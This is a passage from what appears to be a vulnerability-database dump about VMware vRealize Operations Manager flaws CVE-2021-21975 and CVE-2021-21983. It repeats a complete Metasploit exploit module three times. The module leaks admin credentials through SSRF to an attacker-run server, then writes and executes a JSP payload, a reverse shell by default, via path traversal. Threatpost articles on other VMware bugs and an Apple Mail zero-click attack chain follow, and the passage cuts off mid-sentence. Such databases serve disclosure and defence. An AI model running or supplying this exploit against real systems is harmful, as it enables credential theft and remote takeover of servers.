leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-18T23:22:38", "description": "This Metasploit module exploits a pre-auth server-side request forgery (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36160", "href": "https://0day.today/exploit/description/36160", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested against 8.0.1.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36160", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-27T15:49:39", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', \n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write (CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. \n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. \n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 \nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-07T16:47:09", "bulletinFamily": "info", "cvelist": ["CVE-2021-21982"], "description": "Smart cybercriminals are going after web servers and browsers, more so than after individuals. Unfortunately, these types of attacks often go ignored, as they\u2019re harder to test for (in terms of pen-testing).\n\nWith much of the world now working remotely, this threat has intensified. Attackers use email, instant messages, SMS messages and links on social networking to trick at-home workers into installing malware that leads to identity theft, loss of property and, possibly, entry into the corporate network. Phishing attacks may lead users to fake sites or landing pages, with the same intent.\n\nWhat are the latest risks organizations are facing, and what can be done now to defend against them?\n\n## **Web-Based Phishing On the Rise**\n\nThe cybersecurity industry is seeing a significant spike in web-based phishing, starting with the HTML/phishing cyber-threat family. Similar HTML cousins \u2013 /ScrInject (browser script injection attacks) and /REDIR (browser redirection schemes) \u2013 have also contributed to the increase in phishing attempts in 2020. Web-based malware tends to override or bypass most common antivirus (AV) programs, giving it a greater chance of survival and successful infection.\n\nThis reveals a strong interest from cybercriminals in attacking users where they are often most vulnerable and gullible: browsing the web. The combination of remote work and online shopping expand this threat significantly. Black Friday shoppers last year spent a record-shattering [$9 billion](<https://abcnews.go.com/Business/black-friday-hits-record-report/story?id=74435965>), for instance. With the COVID-19 risk of in-person shopping, 2020\u2019s Cyber Monday was reportedly the largest online sales day ever. Web-based malware can obscure and/or bypass traditional AV products, upping the chance of successful infection.\n\n## **Browsers: A Key Delivery Vector for Malware **\n\nBrowsers are not easy to secure, and web applications can be challenging to monitor. These are some of the reasons why the browser has become a key delivery vector for malware over the last year, and this trend will likely continue for the next year. This corresponds to the documented drop in corporate web traffic, which was generally inspected and sanitized, and the rise in home-based web traffic due to the shift to remote work.\n\nThis shift reinforces the point that cybercriminals have intentionally changed their attack methodologies to target the traffic that is now flooding lesser-secured networks. Malware trends reflect attackers\u2019 intentions and capabilities. Similar to intrusion-prevention system (IPS) detections, malware picked up by security sensors does not always indicate confirmed infections, but rather the weaponization and/or distribution of malicious code. Detections can occur at the network, application and host level on many different devices.\n\n## **What Cybersecurity Actions Should I Take Now?**\n\nThere are three things that organizations need to consider when it comes to their cybersecurity strategy:\n\n 1. **Cyber-hygiene is key:** Organizations must provide remote workers with the knowledge and training necessary to secure their own personal networks and the connected business network. This involves training but also guidance on software updates.\n 2. **Organizations can\u2019t rely on employees\u2019 personal security:** They must also provide additional resources, such as endpoint detection-and-response (EDR) solutions that can detect and stop advanced threats. Organizations need advanced, real-time threat protection for endpoints both pre- and post-infection.\n 3. **Effective cybersecurity necessitates continuous vigilance and adaptability to changing threat strategies:** Though security should have been a top priority all along, now may be the time to consider investing in broader, more advanced, adaptable, and integrated solutions \u2013 particularly as cybercriminals modify their attack methods to use personal devices as a springboard to enterprise networks. With this in mind, fortifying remote systems and networks should top the security to-do list.\n\n## **Staying Well-Equipped**\n\nThe threat landscape shifts constantly, requiring security pros to keep on top of new threat types and vectors. Savvy defenders should note that the browser was a prime delivery vector for malware in 2020 \u2013 and is likely to be again this year \u2013 and act accordingly to ensure consistent controls for remote systems. Regardless of the state of the world around us, the best way to protect against ever-evolving malicious activity is to take a comprehensive, integrated approach to cybersecurity.\n\nVital components of this approach include continuous access to up-to-date threat intelligence and cybersecurity training for all employees, particularly those who work remotely. It\u2019s also essential to use updated security technology, such as EDR, which detects and halts advanced threats in real time. All the intelligence in the world won\u2019t do an organization any good if its security tools aren\u2019t capable of using it to find and mitigate attacks. Make sure all of these tactics are part of your comprehensive security strategy.\n\n**_Aamir Lakhani is a cybersecurity researcher and practitioner for Fortinet\u2019s FortiGuard Labs. _**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "modified": "2021-04-05T17:28:13", "published": "2021-04-05T17:28:13", "id": "THREATPOST:6C1025257B798335D913F95B63229B76", "href": "https://threatpost.com/how-to-defend-the-extended-network-against-web-risks/165236/", "type": "threatpost", "title": "How To Defend the Extended Network Against Web Risks", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T21:03:22", "bulletinFamily": "info", "cvelist": ["CVE-2021-21982"], "description": "A critical security vulnerability in the VMware Carbon Black Cloud Workload appliance would allow privilege escalation and the ability to take over the administrative rights for the solution.\n\nThe bug (CVE-2021-21982) ranks 9.1 out of 10 on the CVSS vulnerability-severity scale.\n\nThe VMware Carbon Black Cloud Workload platform is designed to provide cybersecurity defense for virtual servers and workloads that are hosted on the VMware\u2019s vSphere platform. vSphere is VMware\u2019s cloud-computing virtualization platform.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue in the appliance stems from incorrect URL handling, according to VMware\u2019s advisory issued last week.\n\n\u201cA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\u201d the company noted. \u201cAn adversary who has already gained network access to the administrative interface of the appliance may be able to obtain a valid authentication token.\u201d\n\nThat in turn would allow the attacker to access the administration API of the appliance. Once signed in as an admin, the attacker could then view and alter administrative [configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>). Depending on what tools an organization has deployed within the environment, an adversary could carry out a range of attacks, including code execution, disabling security monitoring, enumerating virtual instances within a private cloud and more.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d said the Cybersecurity and Infrastructure Agency (CISA) in a [concurrent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/vmware-releases-security-update>) on the bug.\n\nCompanies are urged to update to the latest version, [version 1.0.2](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/rn/cbc-workload-102-release-notes.html>), of the VMware Carbon Black Cloud Workload appliance, which contains a fix.\n\nUsers should also limit access to the local administrative interface of the appliance to only those that need it, VMware recommended.\n\nEgor Dimitrenko of Positive Technologies was credited with discovering the vulnerability.\n\nThe security hole is only the latest critical problem that VMware has addressed. In February for instance, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "modified": "2021-04-06T20:55:47", "published": "2021-04-06T20:55:47", "id": "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "href": "https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/", "type": "threatpost", "title": "Critical Bug in VMWare Carbon Black Allows Takeover", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T16:39:22", "description": "A zero-click security vulnerability in Apple\u2019s macOS Mail would allow a cyberattacker to add or modify any arbitrary file inside Mail\u2019s sandbox environment, leading to a range of attack types.\n\nAccording to Mikko Kentt\u00e4l\u00e4, founder and CEO of SensorFu, exploitation of the bug could lead to unauthorized disclosure of sensitive information to a third party; the ability to modify a victim\u2019s Mail configuration, including mail redirects which enables takeover of victim\u2019s other accounts via password resets; and the ability to change the victim\u2019s configuration so that the attack can propagate to correspondents in a worm-like fashion.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThough the researcher is just now making the bug\u2019s [details available](<https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c>), it was patched in macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.5, so users should update accordingly.\n\n## **Unauthorized Write Access**\n\nKentt\u00e4l\u00e4 said he discovered the bug ([CVE-2020-9922](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9922>)) by sending test messages and following Mail process syscalls.\n\nHe found that \u201cmail has a feature which enables it to automatically uncompress attachments which have been automatically compressed by another Mail user,\u201d he explained. \u201cIn the valid use case, if the user creates email and adds the folder as an attachment it will be automatically compressed with ZIP and x-mac-auto-archive=yes; is added to the MIME headers. When another Mail user receives this email, compressed attachment data is automatically uncompressed.\u201d\n\nHowever, the researcher discovered that parts of the uncompressed data are not removed from the temporary directory \u2013 and that the directory serves multiple functions, allowing attackers to pivot within the environment.\n\n\u201c[It] is not unique in context of Mail, this can be leveraged to get unauthorized write access to ~/Library/Mail and to $TMPDIR using symlinks inside of those zipped files,\u201d Kentt\u00e4l\u00e4 explained.\n\n## **Zero-Click Attack Path**\n\nTo exploit the bug, a cyberattacker could email two .ZIP files as attachments to the victim, according to the analysis. When a user receives the email, the Mail app will parse it to find any attachments with x-mac-auto-archive=yes header in place. Mail will then automatically unpack those files.\n\n\u201cThe first .ZIP includes a symlink named Mail which points to victims\u2019 $HOME/Library/Mail and file 1.txt,\u201d said Kentt\u00e4l\u00e4. \u201cThe .ZIP gets uncompressed to $TMPDIR/com.apple.mail/bom/. Based on the filename=1.txt.zip header, 1.txt gets copied to the mail director and everything works as expected. However, cleanup is not done right way and the symlink is left in place.\u201d\n\nThis left-behind symlink anchors the second stage of the attack.\n\n\u201cThe second attached .ZIP includes the changes that you want to do to $HOME/Library/Mail. This will provide arbitrary file write permission to Library/Mail,\u201d the researcher explained. \u201cIn my example case I wrote new Mail rules for the Mail application. With that you can add an auto forward rule to the victim\u2019s Mail application.\u201d\n\nThis arbitrary write access means that an attacker can manipulate all of the files in $HOME/Library/Mail, he added.\n\nCVE-2020-9922 is rated 6.5 on the CVSS vulnerability-severity scale, making it medium-severity, but the researcher stressed that successful exploitation could \u201clead to many bad things.\u201d\n\n\u201cAs shown, this will lead to exposure of the sensitive data to a third party through manipulating the Mail application\u2019s configuration,\u201d he said. \u201cOne of the available configuration options is the user\u2019s signature which could be used to make this vulnerability wormable. There is also a chance that this could lead to a remote code-execution (RCE) vulnerability, but I didn\u2019t go that far.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-05T19:10:53", "type": "threatpost", "title": "Apple Mail Zero-Click Security Vulnerability Allows Email Snooping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-9922", "CVE-2021-21982"], "modified": "2021-04-05T19:10:53", "id": "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668", "href": "https://threatpost.com/apple-mail-zero-click-security-vulnerability/165238/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-06-25T16:18:48", "description": "VMware has fixed an uber-severe bug in its Carbon Black App Control (AppC) management server: A server whose job is to lock down critical systems and servers so they don\u2019t get changed willy-nilly.\n\nAppC also ensures that organizations stay in continuous compliance with regulatory mandates.\n\nThis is a bad one: VMware puts the flaw, [CVE-2021-21998](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21998>), in the critical severity range with a maximum CVSSv3 base score of 9.4 out of 10. The bug is an authentication bypass that could enable an attacker with network access to the server to get administrative privileges without needing to authenticate.\n\nAccording to VMware\u2019s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>), the authentication-bypass bug affects AppC versions 8.0, 8.1, 8.5 before 8.5.8, and 8.6 before 8.6.2.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs pointed out by [Heimdal Security](<https://heimdalsecurity.com/blog/vmware-fixes-severe-carbon-black-app-control-authentication-bypass-vulnerability/>), depending on the environment, threat actors could exploit the vulnerability \u201cto maximum advantage to attack anything from point-of-sale [systems] (PoS) to industrial-control systems.\u201d\n\nTo avoid that, organizations must patch, as there are no workarounds available.\n\nBelow are the patches, listed in the Fixed Version column of the VMware\u2019s Response Matrix:\n\nProduct | Version | Running On | CVE Identifier | CVSSv3 | Severity | Fixed Version | Version Workarounds | Additional Documentation \n---|---|---|---|---|---|---|---|--- \nAppC | 8.6.x | Windows | CVE-2021-21998 | 9.4 | critical | 8.6.2 | None | None \nAppC | 8.5.x | Windows | CVE-2021-21998 | 9.4 | critical | \n\n8.5.8\n\n| None | None \nAppC | 8.1.x, 8.0.x | Windows | CVE-2021-21998 | 9.4 | critical | Hotfix | None | None \n \nCredit for discovering and reporting CVE-2021-21999 goes to [Zeeshan Shaikh](<https://twitter.com/bugzzzhunter>) from NotSoSecure, who worked with Trend Micro Zero Day Initiative (ZDI) and [Hou JingYi](<https://twitter.com/hjy79425575>) of Qihoo 360.\n\n## Plus This: High-Risk Bug in Other VMware Products\n\nBesides the authentication-bypass fix, VMware also published a security advisory for a high-risk bug in VMware Tools, VMware Remote Console for Windows (VMRC), and VMware App Volumes products.\n\nAt this point, the bug doesn\u2019t have a severity score from the National Institute of Standards and Technology (NIST), but VMware evaluated it at 7.8 (high severity). The flaw, [CVE-2021-21999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21999>), is a local privilege-escalation vulnerability.\n\nVMware\u2019s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>) lists the affected products as VMware Tools for Windows (11.x.y prior to 11.2.6), VMware Remote Console for Windows (12.x prior to 12.0.1) , and VMware App Volumes (2.x prior to 2.18.10 and 4 prior to 2103).\n\nOnce again, there\u2019s no workaround for this one. Admins should patch it as soon as possible, given what VMware said can be done with it:\n\n> An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as `openssl.cnf\u2019 in an unrestricted directory which would allow code to be executed with elevated privileges.\n\n## History of Critical Holes\n\nThe security hole 